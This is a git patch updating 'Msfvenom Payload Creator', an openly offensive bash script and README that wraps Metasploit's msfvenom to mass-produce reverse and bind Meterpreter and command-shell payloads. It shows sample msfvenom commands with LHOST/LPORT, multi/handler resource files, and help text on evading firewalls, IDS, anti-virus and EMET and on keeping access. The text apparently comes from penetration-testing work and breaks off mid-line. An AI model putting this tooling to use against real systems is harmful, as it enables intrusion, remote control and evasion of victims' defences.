From 007db2720fbddd9b34dbfdfc91aa52a6d5c9b432 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Mon, 20 Jul 2015 17:00:36 +0100 Subject: [PATCH] v1.3 WAN + Bind/Reverse + tcp/http/https/find_port + Add direction: Bind / Reverse + Add method: tcp / http / https/ find_port (& allports) + Add verbose to help screen (with URLs) + Detect & use external/WAN IP address + Display any errors from Metasploit/msfvenom when creating + File stats (md5/sha1/size) when using verbose + Output names include port & direction + Rather than limiting what payloads can be create - always create + This way when Metasploit is updated, the script isn't dated. + Redirect rather than using `-o` (for legacy metasploit versions - Fix for #1) --- README.md | 137 +++++++----- mpc.sh | 643 +++++++++++++++++++++++++++++++++--------------------- 2 files changed, 478 insertions(+), 302 deletions(-) diff --git a/README.md b/README.md index 20cba46..eb8de34 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/0q41eqR.png) +![Msfvenom Payload Creator (MPC)](https://i.imgur.com/JwSYBRZ.png) - - - @@ -9,15 +9,20 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (p Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. **Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_. -The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands** and a **quick web server** etc). +The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_). The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`). +* Can't remember your IP for a interface? Don't sweat it, just use the interface name: `eth0`. +* Don't know what your external IP is? MPC will discover it: `wan`. +* Want to generate one of each payload? No issue! Try: `loop`. +* Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)! + _Note: This will **not** try to bypass any anti-virus solutions._ ## Install -* Designed for **Kali Linux 1.1.0a+** & **Metasploit v4.11+** _(nothing else has been tested)_. +* Designed for **Kali Linux v1.1.0a+** & **Metasploit v4.11+** _(nothing else has been tested)_. ``` curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc @@ -28,17 +33,18 @@ mpc ## Help ``` bash -root@kali:~# mpc - [*] Msfvenom Payload Creator (MPC v1.2) +root@kali:~# mpc -h -v + [*] Msfvenom Payload Creator (MPC v1.3) - [i] /usr/bin/mpc () () () () () () + [i] /usr/bin/mpc () () () () () () () () [i] Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP. [i] /usr/bin/mpc elf eth0 4444 # Linux, eth0's IP & manual port. [i] /usr/bin/mpc stageless cmd py verbose # Python, stageless command prompt. [i] /usr/bin/mpc loop eth1 # A payload for every type, using eth1's IP. - [i] /usr/bin/mpc msf batch eth1 # All possible Meterpreter payloads, using eth1's IP. + [i] /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP. + [i] /usr/bin/mpc help verbose # This help screen, with even more information. - [i] : (All reverse TCP payloads) + [i] : [i] + ASP [i] + ASPX [i] + Bash [.sh] @@ -57,20 +63,40 @@ root@kali:~# mpc [i] Missing will default to 443. - [i] splits the payload into parts, making it smaller but dependant on Metasploit. - [i] is the complete standalone payload. More 'stabe' than . - [i] Missing will default to . - [i] Note: Metasploit doesn't (yet!) support for every format. - [i] is a standard/native command prompt/terminal to interactive with. [i] is a custom cross platform Meterpreter shell, gaining the full power of Metasploit. - [i] Note: Metasploit doesn't (yet!) support / for every format. - [i] Missing will default to Meterpreter. - - [i] will generate as many combinations as possible: , & . + [i] Missing will default to where possible. + [i] Note: Metasploit doesn't (yet!) support for every format. + [i] payloads are generally smaller than and easier to bypass EMET. Limit Metasploit post modules/scripts support. + [i] payloads are generally much larger than , as it comes with more features. + + [i] opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target. + [i] makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target. + [i] Missing will default to . + [i] allows for the attacker to connect whenever they wish. needs to the target to be repeatedly connecting back to permanent maintain access. + + [i] splits the payload into parts, making it smaller but dependent on Metasploit. + [i] is the complete standalone payload. More 'stable' than . + [i] Missing will default to where possible. + [i] Note: Metasploit doesn't (yet!) support for every format. + [i] are 'better' in low-bandwidth/high-latency environments. + [i] are seen as 'stealthier' when bypassing Anti-Virus protections. may work 'better' with IDS/IPS. + [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads + [i] https://www.offensive-security.com/metasploit-unleashed/payload-types/ + [i] https://www.offensive-security.com/metasploit-unleashed/payloads/ + + [i] is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs. + [i] makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80. + [i] makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443. + [i] will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on . + [i] Missing will default to . + [i] By altering the traffic, such as and even more , it will slow down the communication & increase the payload size. + [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication + + [i] will generate as many combinations as possible: , , , & [i] will just create one of each . - [i] will display more information during the process. + [i] will display more information. root@kali:~# ``` @@ -78,13 +104,14 @@ root@kali:~# ```bash root@kali:~# mpc windows 192.168.1.10 - [*] Msfvenom Payload Creator (MPC v1.2) - [i] IP: 192.168.1.10 - [i] PORT: 443 - [i] TYPE: windows (windows/meterpreter_reverse_tcp) - [i] CMD: msfvenom -p windows/meterpreter_reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 -o /root/windows-stageless-meterpreter-443.exe - [i] windows meterpreter created: '/root/windows-stageless-meterpreter-443.exe' - [i] MSF handler file: '/root/windows-stageless-meterpreter-443-exe.rc' (msfconsole -q -r /root/windows-stageless-meterpreter-443-exe.rc) + [*] Msfvenom Payload Creator (MPC v1.3) + [i] IP: 192.168.1.10 + [i] PORT: 443 + [i] TYPE: windows (windows/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe + [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting... + [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe' + [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc) [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# @@ -94,13 +121,13 @@ root@kali:~# ```bash root@kali:~# ./mpc elf eth0 4444 - [*] Msfvenom Payload Creator (MPC v1.2) - [i] IP: 192.168.103.240 - [i] PORT: 4444 - [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.240 LPORT=4444 -o /root/linux-staged-meterpreter-4444.elf - [i] linux meterpreter created: '/root/linux-staged-meterpreter-4444.elf' - [i] MSF handler file: '/root/linux-staged-meterpreter-4444-elf.rc' (msfconsole -q -r /root/linux-staged-meterpreter-4444-elf.rc) + [*] Msfvenom Payload Creator (MPC v1.3) + [i] IP: 192.168.103.238 + [i] PORT: 4444 + [i] TYPE: linux (linux/x86/shell/reverse_tcp) + [i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf + [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf' + [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc' (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc) [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# @@ -109,36 +136,44 @@ root@kali:~# ## Example \#3 (Python Format, Stageless Command Prompt Using Interactive IP Menu) ```bash -root@kali:~# bash mpc.sh stageless cmd py verbose - [*] Msfvenom Payload Creator (MPC v1.2) +root@kali:~# mpc stageless cmd py verbose + [*] Msfvenom Payload Creator (MPC v1.3) [i] Use which interface/IP address?: - [i] 1.) eth0 - 192.168.103.240 + [i] 1.) eth0 - 192.168.103.238 [i] 2.) eth1 - 192.168.155.175 - [i] 3.) lo - 127.0.0.1 - [?] Select 1-3, interface or IP address: 2 - - [i] IP: 192.168.155.175 - [i] PORT: 443 - [i] TYPE: python (python/shell_reverse_tcp) - [i] STAGE: stageless - [i] SHELL: shell - [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.155.175 LPORT=443 -o /root/python-stageless-shell-443.py - [i] python shell created: '/root/python-stageless-shell-443.py' - [i] MSF handler file: '/root/python-stageless-shell-443-py.rc' (msfconsole -q -r /root/python-stageless-shell-443-py.rc) + [i] 3.) tap0 - 10.10.100.63 + [i] 4.) lo - 127.0.0.1 + [i] 5.) wan - xx.xx.xx.xx + [?] Select 1-5, interface or IP address: 3 + + [i] IP: 10.10.100.63 + [i] PORT: 443 + [i] TYPE: python (python/shell_reverse_tcp) + [i] SHELL: shell + [i] DIRECTION: reverse + [i] STAGE: stageless + [i] METHOD: tcp + [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py + [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py' + [i] File: ASCII text, with very long lines, with no line terminators + [i] Size: 4.0K + [i] MD5: 53452eafafe21bff94e6c4621525165b + [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9 + [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc) [?] Quick web server for file transfer? python -m SimpleHTTPServer 8080 [*] Done! root@kali:~# ``` +_Note: Removed WAN IP._ -![Examples](https://i.imgur.com/m4lG23l.png) +![Examples](https://i.imgur.com/r9Qmzda.png) - - - ## To-Do List -* Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._ -* Support different payloads (e.g. `reverse_http`/`reverse_https`, `bind`, `find_port` etc) +* Shellcode generation * x64 payloads -* external IP/WAN -* _...IPv6 support?_ +* IPv6 support +* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_ \ No newline at end of file diff --git a/mpc.sh b/mpc.sh index c2b4572..95ec859 100755 --- a/mpc.sh +++ b/mpc.sh @@ -1,6 +1,6 @@ #!/bin/bash #-Metadata----------------------------------------------------# -# Filename: mpc.sh (v1.2) (Update: 2015-07-01) # +# Filename: mpc.sh (v1.3) (Update: 2015-07-20) # #-Info--------------------------------------------------------# # Quickly generate Metasploit payloads using msfvenom. # #-Author(s)---------------------------------------------------# @@ -12,15 +12,19 @@ #-Notes-------------------------------------------------------# # Requires: # # Metasploit Framework v4.11.3-2015062101 or higher # -# Will not auto update when there are more payloads added # # --- # -# Commands: # +# Older Metasploit/msfvenom do not have '-o', so '>' instead # +# --- # +# Useful Manual Commands: # # msfvenom --list payloads # +# msfvenom --list encoders # # msfvenom --help-formats # # --- # # Payload names: # # shell_bind_tcp - Single / Inline / NonStaged / Stageless # # shell/bind_tcp - Staged (Requires Metasploit)   # +#--Quick Install----------------------------------------------# +# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc; chmod +x /usr/bin/mpc #-More information--------------------------------------------# # - https://www.offensive-security.com/metasploit-unleashed/payloads/ # - https://www.offensive-security.com/metasploit-unleashed/payload-types/ @@ -29,9 +33,6 @@ # - https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom # - https://community.rapid7.com/community/metasploit/blog/2014/12/09/good-bye-msfpayload-and-msfencode # - https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom -#--Install----------------------------------------------------# -# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc -# chmod +x /usr/bin/mpc #-------------------------------------------------------------# @@ -39,28 +40,32 @@ ##### Variables -OUTPATH="$(pwd)/" # ./ /var/www/ /tmp/ +OUTPATH="$(pwd)/" # Others: ./ /tmp/ /var/www/ ##### (Cosmetic) Colour output RED="\033[01;31m" # Issues/Errors GREEN="\033[01;32m" # Success/Asking for Input YELLOW="\033[01;33m" # Warnings/Information BLUE="\033[01;34m" # Heading +BOLD="\033[01;01m" # Highlight RESET="\033[00m" # Normal ##### Read command line arguments -TYPE="" #"$(echo ${1} | \tr '[:upper:]' '[:lower:]')" -IP="" #"${2}" -PORT="" #"${3}" -STAGE="" # staged // stageless -SHELL="" # shell // meterpreters +TYPE="" #"$(echo ${1} | \tr '[:upper:]' '[:lower:]')" Defalut: *REQUIRED* +IP="" #"${2}" Defalut: *IP menu* +PORT="" #"${3}" Deafult: 443 +SHELL="" # shell // meterpreter Default: meterpreter +DIRECTION="" # reverse // bind Default: reverse +STAGE="" # staged // stageless Default: stageless +METHOD="" # tcp // http // https // find_port Default: tcp VERBOSE=false ##### Default values -SUCCESS=false -DOMAIN=false -BATCH=false -LOOP=false +SUCCESS=false # Did we successfully create a payload? +DOMAIN=false # IP address or domain name? +BATCH=false # Are we creating multiple payloads (one of each type) ? +LOOP=false # Are we creating multiple payloads (every possible combination)? +HELP=false # Display the help screen? ##### (Optional) Enable debug mode? #set -x @@ -68,7 +73,7 @@ LOOP=false #-Function-------------------------------------------------------------# -## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL STAGE VERBOSE +## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL DIRECTION STAGE METHOD VERBOSE function doAction { TYPE="${1}" IP="${2}" @@ -77,53 +82,67 @@ function doAction { CMD="${5}" FILEEXT="${6}" SHELL="${7}" - STAGE="${8}" - VERBOSE="${9}" + DIRECTION="${8}" + STAGE="${9}" + METHOD="${10}" + VERBOSE="${11}" if [[ -z "${VERBOSE}" ]]; then - echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}: doAction TYPE(${TYPE}) IP(${IP}) PORT(${PORT}) PAYLOAD(${PAYLOAD}) CMD(${CMD}) FILEEXT(${FILEEXT}) SHELL(${SHELL}) STAGE(${STAGE}) VERBOSE(${VERBOSE})" >&2 + echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}: doAction TYPE(${TYPE}) IP(${IP}) PORT(${PORT}) PAYLOAD(${PAYLOAD}) CMD(${CMD}) FILEEXT(${FILEEXT}) SHELL(${SHELL}) DIRECTION(${DIRECTION}) STAGE(${STAGE}) METHOD(${METHOD}) VERBOSE(${VERBOSE})" >&2 exit 2 fi - if [[ "${STAGE}" == 'true' ]]; then _STAGE='-staged' - else _STAGE=''; fi - - FILENAME="${OUTPATH}$(echo ${TYPE}-${STAGE}-${SHELL}-${PORT}.${FILEEXT} | \tr '[:upper:]' '[:lower:]')" - FILEHANDLE="${OUTPATH}$(echo ${TYPE}-${STAGE}-${SHELL}-${PORT}-${FILEEXT}.rc | \tr '[:upper:]' '[:lower:]')" + FILENAME="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}" + FILEHANDLE="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}-${FILEEXT}.rc" X=" IP" - [[ "${DOMAIN}" == "true" ]] && X='NAME' - - echo -e " ${YELLOW}[i]${RESET} ${X}: ${YELLOW}${IP}${RESET}" - echo -e " ${YELLOW}[i]${RESET} PORT: ${YELLOW}${PORT}${RESET}" - echo -e " ${YELLOW}[i]${RESET} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})" - [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} STAGE: ${YELLOW}${STAGE}${RESET}" - [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} SHELL: ${YELLOW}${SHELL}${RESET}" - echo -e " ${YELLOW}[i]${RESET} CMD: ${YELLOW}${CMD}${RESET}" + [[ "${DOMAIN}" == "true" ]] && X='NAME' + [[ "${VERBOSE}" == "true" ]] && PADDING=' ' + + echo -e " ${YELLOW}[i]${RESET}${PADDING} ${X}: ${YELLOW}${IP}${RESET}" + echo -e " ${YELLOW}[i]${RESET}${PADDING} PORT: ${YELLOW}${PORT}${RESET}" + echo -e " ${YELLOW}[i]${RESET}${PADDING} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} SHELL: ${YELLOW}${SHELL}${RESET}" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} DIRECTION: ${YELLOW}${DIRECTION}${RESET}" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} STAGE: ${YELLOW}${STAGE}${RESET}" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} METHOD: ${YELLOW}${METHOD}${RESET}" + echo -e " ${YELLOW}[i]${RESET}${PADDING} CMD: ${BOLD}${CMD}${RESET}" [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. Overwriting..." && rm -f "${FILENAME}" - eval "${CMD}" 2>/dev/null + eval "${CMD}" 2>/tmp/mpc.out + [[ ! -s "${FILENAME}" ]] && rm -f "${FILENAME}" if [[ -e "${FILENAME}" ]]; then echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'" + \chmod +x "${FILENAME}" else - echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET}. =(" >&2 + echo "" + \grep -q 'Invalid Payload Selected' /tmp/mpc.out 2>/dev/null + if [[ "$?" == '0' ]]; then + echo -e " ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2 + \rm -f /tmp/mpc.out + else + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." >&2 + echo -e "\n----------------------------------------------------------------------------------------${RED}" + \cat /tmp/mpc.out + echo -e "${RESET}----------------------------------------------------------------------------------------\n" + fi exit 2 fi + \rm -f /tmp/mpc.out - #echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})" - #echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)" - #echo -e " ${YELLOW}[i]${RESET} MD5: $(\openssl md5 ${FILENAME} | \awk '{print $2}')" - #echo -e " ${YELLOW}[i]${RESET} SHA1: $(\openssl sha1 ${FILENAME} | \awk '{print $2}')" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} MD5: $(\openssl md5 ${FILENAME} | \awk '{print $2}')" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} SHA1: $(\openssl sha1 ${FILENAME} | \awk '{print $2}')" cat < "${FILEHANDLE}" # -# RUN: service postgresql start; service metasploit start; msfconsole -q -r "${FILENAME}" +# RUN: service postgresql start;service metasploit start; msfconsole -q -r "${FILENAME}" # use exploit/multi/handler set PAYLOAD ${PAYLOAD} set LHOST ${IP} set LPORT ${PORT} -#set AutoRunScript "migrate -f -k" post/windows/manage/smart_migrate set ExitOnSession false run -j EOF @@ -132,25 +151,103 @@ EOF return } +## doAction +function doHelp { + echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} () () () () () () () ()" + echo -e " ${YELLOW}[i]${RESET} Example: ${0} windows 192.168.1.10 # Windows & manual IP." + echo -e " ${YELLOW}[i]${RESET} ${0} elf eth0 4444 # Linux, eth0's IP & manual port." + echo -e " ${YELLOW}[i]${RESET} ${0} stageless cmd py verbose # Python, stageless command prompt." + echo -e " ${YELLOW}[i]${RESET} ${0} loop eth1 # A payload for every type, using eth1's IP." + echo -e " ${YELLOW}[i]${RESET} ${0} msf batch wan # All possible Meterpreter payloads, using WAN IP." + echo -e " ${YELLOW}[i]${RESET} ${0} help verbose # This help screen, with even more information." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}TYPE${RESET}>:" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASP${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASPX${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}PHP${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET}]" + echo "" + echo -e " ${YELLOW}[i]${RESET} Rather than putting <${BOLD}DOMAIN/IP${RESET}>, you can do a ${YELLOW}interface${RESET} and MPC will detect that IP address." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}DOMAIN/IP${RESET}> will default to the ${YELLOW}IP menu${RESET}." + echo "" + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}PORT${RESET}> will default to ${YELLOW}443${RESET}." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}CMD${RESET}> is a standard/${YELLOW}native command prompt${RESET}/terminal to interactive with." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}MSF${RESET}> is a custom ${YELLOW}cross platform Meterpreter${RESET} shell, gaining the full power of Metasploit." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}CMD/MSF${RESET}> will default to ${YELLOW}${RESET} where possible." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support <${BOLD}CMD/MSF${RESET}> for every <${BOLD}TYPE${RESET}> format." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} <${BOLD}CMD${RESET}> payloads are generally ${YELLOW}smaller${RESET} than <${BOLD}MSF${RESET}> and easier to bypass EMET. Limit Metasploit post modules/scripts support." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} <${BOLD}MSF${RESET}> payloads are generally much ${YELLOW}larger${RESET} than <${BOLD}CMD${RESET}>, as it comes with ${YELLOW}more features${RESET}." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}BIND${RESET}> ${YELLOW}opens a port on the target side${RESET}, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}REVERSE${RESET}> makes ${YELLOW}the target connect back to the attacker${RESET}. The attacker needs an open port. Blocked with engress firewalls rules on the target." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}BIND/REVERSE${RESET}> will default to ${YELLOW}${RESET}." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} <${BOLD}BIND${RESET}> allows for the ${YELLOW}attacker to connect whenever they wish${RESET}. <${BOLD}REVERSE${RESET}> needs to the target to be repeatedly connecting back to ${YELLOW}permanent maintain access${RESET}." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}STAGED${RESET}> splits the payload into parts, making it ${YELLOW}smaller but dependent on Metasploit${RESET}." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}STAGELESS${RESET}> is the complete ${YELLOW}standalone payload${RESET}. More 'stable' than <${BOLD}STAGED${RESET}>." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}STAGED/STAGELESS${RESET}> will default to ${YELLOW}${RESET} where possible." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Note: Metasploit doesn't (yet!) support <${BOLD}STAGED/STAGELESS${RESET}> for every <${BOLD}TYPE${RESET}> format." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} are 'better' in ${YELLOW}low-bandwidth/high-latency${RESET} environments." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} are seen as 'stealthier' when bypassing Anti-Virus protections. <${BOLD}STAGED${RESET}> may work 'better' with IDS/IPS." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} ${YELLOW}More information${RESET}: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} https://www.offensive-security.com/metasploit-unleashed/payload-types/" + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} https://www.offensive-security.com/metasploit-unleashed/payloads/" + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}TCP${RESET}> is the standard method to connecting back. This is the ${YELLOW}most compatible with TYPES as its RAW${RESET}. Can be easily detected on IDSs." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}HTTP${RESET}> makes the ${YELLOW}communication appear to be HTTP traffic${RESET} (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}HTTPS${RESET}> makes the ${YELLOW}communication appear to be (encrypted) HTTP traffic${RESET} using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443." + echo -e " ${YELLOW}[i]${RESET} <${BOLD}FIND_PORT${RESET}> will ${YELLOW}attempt every port on the target machine, to find a way out${RESET}. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <${BOLD}TYPE${RESET}>." + echo -e " ${YELLOW}[i]${RESET} Missing <${BOLD}TCP/HTTP/HTTPS/FIND_PORT${RESET}> will default to ${YELLOW}${RESET}." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} By altering the traffic, such as <${BOLD}HTTP${RESET}> and even more ${BOLD}, it ${YELLOW}will slow down the communication & increase the payload size${RESET}." + [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} ${YELLOW}More information${RESET}: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication" + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}BATCH${RESET}> will generate ${YELLOW}as many combinations as possible${RESET}: <${BOLD}TYPE${RESET}>, <${BOLD}CMD + MSF${RESET}>, <${BOLD}BIND + REVERSE${RESET}>, <${BOLD}STAGED + STAGLESS${RESET}> & <${BOLD}TCP + HTTP + HTTPS + FIND_PORT${RESET}> " + echo -e " ${YELLOW}[i]${RESET} <${BOLD}LOOP${RESET}> will just create ${YELLOW}one of each${RESET} <${BOLD}TYPE${RESET}>." + echo "" + echo -e " ${YELLOW}[i]${RESET} <${BOLD}VERBOSE${RESET}> will display ${YELLOW}more information${RESET}." + exit 1 +} + #-Start----------------------------------------------------------------# ## Banner -echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.2${RESET})" +echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.3${RESET})" ## Check system +## Are we using Linux? (Sorry OSX users) +if [[ "$(\uname)" != "Linux" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}You're not using Linux${RESET}" >&2 + exit 3 +fi + ## msfvenom installed? if [[ ! -n "$(\which msfvenom)" ]]; then echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find msfvenom${RESET}" >&2 exit 3 fi -## Are we using Linux? (Sorry OSX users) -if [[ "$(\uname)" != "Linux" ]]; then - echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}You're not using Linux${RESET}" >&2 - exit 3 +## cURL/wget installed? +if [[ -n "$(\which curl)" || -n "$(\which wget)" ]]; then + ## Try and get external IP + WAN="" + [[ -n "$(\which curl)" ]] 